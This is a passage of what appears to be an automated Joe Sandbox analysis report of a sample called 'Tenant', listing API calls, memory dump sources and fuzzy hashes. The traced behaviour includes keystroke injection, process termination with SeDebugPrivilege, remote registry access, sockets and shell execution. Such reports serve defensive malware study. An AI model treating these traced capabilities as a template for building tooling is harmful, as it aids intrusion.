                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AFA263
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00AFA266
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA26F
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AFA28D
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AFA290
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00AFA299
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AFA2B0
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AFA2B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 6729ee7df7326ff709ae3e4e3a830db21a001174155e983cf957df54f802315c
                                                                                        • Instruction ID: dbc8c21792b4c98cfd893698fa494c83a7be2d26d6141c722fa5434713085ace
                                                                                        • Opcode Fuzzy Hash: 6729ee7df7326ff709ae3e4e3a830db21a001174155e983cf957df54f802315c
                                                                                        • Instruction Fuzzy Hash: 4C1182B1660618BEF6106B609C4AFAA7A2DEF4C751F610415F7546B090CEF25C509AB4
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF915A,00000B00,?,?), ref: 00AF94E2
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF94E9
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF915A,00000B00,?,?), ref: 00AF94FE
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00AF915A,00000B00,?,?), ref: 00AF9506
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF9509
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF915A,00000B00,?,?), ref: 00AF9519
                                                                                        • GetCurrentProcess.KERNEL32(00AF915A,00000000,?,00AF915A,00000B00,?,?), ref: 00AF9521
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00AF915A,00000B00,?,?), ref: 00AF9524
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AF954A,00000000,00000000,00000000), ref: 00AF953E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 6fe925547df4a2c3a592c90b10c36a8597084808d70c20ef0a708777861ad2b2
                                                                                        • Instruction ID: e512536eba03332f8dd651d5e32744f81b5aa47ec2c3f5e7ca8ce72e5e80a659
                                                                                        • Opcode Fuzzy Hash: 6fe925547df4a2c3a592c90b10c36a8597084808d70c20ef0a708777861ad2b2
                                                                                        • Instruction Fuzzy Hash: 0101CDB5250708BFE750AFA5DC5DF6B7BACEF89711F104411FA05DB1A1CA709804DB20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 2c192b44ef6239c54df070acd4bbf9d9b9a3cb1d8e78bd153d12d9d736da562c
                                                                                        • Instruction ID: 4fc9264518134ee6a712a32cd442fbd18417f31502180f01b522d29e28ed7c3b
                                                                                        • Opcode Fuzzy Hash: 2c192b44ef6239c54df070acd4bbf9d9b9a3cb1d8e78bd153d12d9d736da562c
                                                                                        • Instruction Fuzzy Hash: 3CC1A171A0121A9FDF10DF98D884BEEB7F5FF58310F5484A9E915AB280E770AD84CB91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: ac2e3a8956996cade0765b0997cca432fcff96c96de62706097b7467ba6a4f8d
                                                                                        • Instruction ID: 9c23d6e8b9a7ed1c2b95bf2f202bff1a30d37bcce262bc1227f3cdaeacaf173c
                                                                                        • Opcode Fuzzy Hash: ac2e3a8956996cade0765b0997cca432fcff96c96de62706097b7467ba6a4f8d
                                                                                        • Instruction Fuzzy Hash: EF918A31A00259ABDF24CFA5C8A4FEEBBF8EF45710F50859DE515AB290D7709984CBA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B27449
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B2745D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B27477
                                                                                        • _wcscat.LIBCMT ref: 00B274D2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B274E9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B27517
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: a73d601b6b3e64d0ecdfc398ec99acead57a76d21deea6a551694ce6baf1d215
                                                                                        • Instruction ID: 3b1fa6ce838db2122ca468de4f71ac70b3d34df129063acab5331b02987a8679
                                                                                        • Opcode Fuzzy Hash: a73d601b6b3e64d0ecdfc398ec99acead57a76d21deea6a551694ce6baf1d215
                                                                                        • Instruction Fuzzy Hash: 7341C470544318AFDB21DF64DC85FEEBBE8EF08350F1044AAF958A7291DA719D84CB54
                                                                                        APIs
                                                                                          • Part of subcall function 00B04148: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0416D
                                                                                          • Part of subcall function 00B04148: Process32FirstW.KERNEL32(00000000,?), ref: 00B0417B
                                                                                          • Part of subcall function 00B04148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B04245
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1F08D
                                                                                        • GetLastError.KERNEL32 ref: 00B1F0A0
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B1F0CF
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B1F14C
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00B1F157
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1F18C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 1701285019-2896544425
                                                                                        • Opcode ID: c5b5d59adb34ce52039e2647f149e2a424cdf8a974035d2b647e4f192e9446a7
                                                                                        • Instruction ID: 54a845711db5f36f387f9c3da0bfed4ef4ae9d0155e5c4b429d809f3afbdf024
                                                                                        • Opcode Fuzzy Hash: c5b5d59adb34ce52039e2647f149e2a424cdf8a974035d2b647e4f192e9446a7
                                                                                        • Instruction Fuzzy Hash: 7641CD31204202AFD711EF64CDA5FBDB7E5AF84714F588499F902AB2D2CBB4A844CB85
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00B0357C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 48aec774e2b1694658a893099d27536289f2a007e2ce6969f1e4f65565949e23
                                                                                        • Instruction ID: fef39b3cee460e7f1edd4fccd752091be0fe3095966587cf86b51284b79d40a0
                                                                                        • Opcode Fuzzy Hash: 48aec774e2b1694658a893099d27536289f2a007e2ce6969f1e4f65565949e23
                                                                                        • Instruction Fuzzy Hash: 2C110A72658B46BEEF005B14DCD6E6E7BDCDF25B60F2040EEFA00A61D1EB656F4046A0
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B04802
                                                                                        • LoadStringW.USER32(00000000), ref: 00B04809
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B0481F
                                                                                        • LoadStringW.USER32(00000000), ref: 00B04826
                                                                                        • _wprintf.LIBCMT ref: 00B0484C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B0486A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00B04847
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 1d9080e7ee977ef82c69e633993615ed47f19d905e1eeeebbdd6bb2d1daeb944
                                                                                        • Instruction ID: f70f107e75c2a18b1918e21fe2306970761ffacbcbca567dcf66bc3fe648747f
                                                                                        • Opcode Fuzzy Hash: 1d9080e7ee977ef82c69e633993615ed47f19d905e1eeeebbdd6bb2d1daeb944
                                                                                        • Instruction Fuzzy Hash: 5F014FF29143087FE711A7A49D89EFA77ACEB08301F504595BB49E3041EF749E844B75
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00B2DB42
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00B2DB62
                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2DD9D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2DDBB
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2DDDC
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00B2DDFB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00B2DE20
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2DE43
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                        • String ID:
                                                                                        • API String ID: 1211466189-0
                                                                                        • Opcode ID: 6d2e6d60e568cf1b7b1ba8a4e77d77b916b6b90b220fd9fe95a148ff2f29cdfd
                                                                                        • Instruction ID: 40ca2374bd4dcea91667a4e8b87b978a7d38a5382786b427fbc17787a1201a22
                                                                                        • Opcode Fuzzy Hash: 6d2e6d60e568cf1b7b1ba8a4e77d77b916b6b90b220fd9fe95a148ff2f29cdfd
                                                                                        • Instruction Fuzzy Hash: A5B19831600225ABDF14CF69D9C97AD7BF1FF44701F0980A9EC48AF295DB74A950CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00B2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2044E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3479070676-0
                                                                                        • Opcode ID: c4e84f4e1236382ae5a91df7f7636cc2fef8d020f0e9bfe9f8aeef2f2286a0dd
                                                                                        • Instruction ID: e58bd7beace786a7a64154d2083b6fe624d869f566a6ed369601d1a2fcec8821
                                                                                        • Opcode Fuzzy Hash: c4e84f4e1236382ae5a91df7f7636cc2fef8d020f0e9bfe9f8aeef2f2286a0dd
                                                                                        • Instruction Fuzzy Hash: EEA1B8302142159FCB11EF24D891F6EBBE5EF88314F14895DF99A8B2A2DB31E945CF42
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00AA2E9F
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2EE7
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00ADC55B
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC508,00000004,00000000,00000000,00000000), ref: 00ADC5C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 782ebc103dd8f465154b7a30856f0d0758d2bb7fe80a0ed1c3d6e63909496387
                                                                                        • Instruction ID: 20ad4cd3ff6ecc5b7c61d77c76118620cc1c9e0834ac68d60159a7c1e4945096
                                                                                        • Opcode Fuzzy Hash: 782ebc103dd8f465154b7a30856f0d0758d2bb7fe80a0ed1c3d6e63909496387
                                                                                        • Instruction Fuzzy Hash: 1D41F8306187819AD7399B2C998876A7FA2AF83310F64841EE447476E1CB75B9E0DB10
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B07698
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B076CF
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00B076EB
                                                                                        • _memmove.LIBCMT ref: 00B07739
                                                                                        • _memmove.LIBCMT ref: 00B07756
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00B07765
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B0777A
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07799
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        • Opcode ID: 5980727cfeaf41f34e27457055646b2188f69d8da516ef0078bb2af34444fb34
                                                                                        • Instruction ID: 065947469beb6ed9d079065bd124557f2039be4f6c469c2c70bc2dcb87d902ca
                                                                                        • Opcode Fuzzy Hash: 5980727cfeaf41f34e27457055646b2188f69d8da516ef0078bb2af34444fb34
                                                                                        • Instruction Fuzzy Hash: 4E319231A04209EBCF10EF54DD85E6FBBB8EF45340B2540A9F904AB256DB70DE54DBA0
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B26810
                                                                                        • GetDC.USER32(00000000), ref: 00B26818
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B26823
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B2682F
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B2686B
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B2687C
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B2964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B268B6
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B268D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: 79faebf4895a963b4c4ee23933844c6b229788a00856e91cff9059be003169b4
                                                                                        • Instruction ID: c598b1d9048399bd8f23b6621892264f049bc6f5c11ec659f48571f554121540
                                                                                        • Opcode Fuzzy Hash: 79faebf4895a963b4c4ee23933844c6b229788a00856e91cff9059be003169b4
                                                                                        • Instruction Fuzzy Hash: FF316D72111224BFEB159F10DC9AFAA3BADEF49761F044055FE089E291CB759C51CB70
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2931989736-0
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • _wcstok.LIBCMT ref: 00B0F2D7
                                                                                        • _wcscpy.LIBCMT ref: 00B0F366
                                                                                        • _memset.LIBCMT ref: 00B0F399
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B172EB
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B1730C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B1731F
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00B173D5
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00B17392
                                                                                          • Part of subcall function 00AFB4EA: _strlen.LIBCMT ref: 00AFB4F4
                                                                                          • Part of subcall function 00AFB4EA: _memmove.LIBCMT ref: 00AFB516
                                                                                        • _strlen.LIBCMT ref: 00B1742F
                                                                                        • _memmove.LIBCMT ref: 00B17498
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        • IsWindow.USER32(01125678), ref: 00B2BA5D
                                                                                        • IsWindowEnabled.USER32(01125678), ref: 00B2BA69
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2BB4D
                                                                                        • SendMessageW.USER32(01125678,000000B0,?,?), ref: 00B2BB84
                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00B2BBC1
                                                                                        • GetWindowLongW.USER32(01125678,000000EC), ref: 00B2BBE3
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2BBFB
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID:
                                                                                        • API String ID: 4072528602-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B1FB31
                                                                                        • _memset.LIBCMT ref: 00B1FBFA
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B1FC3F
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
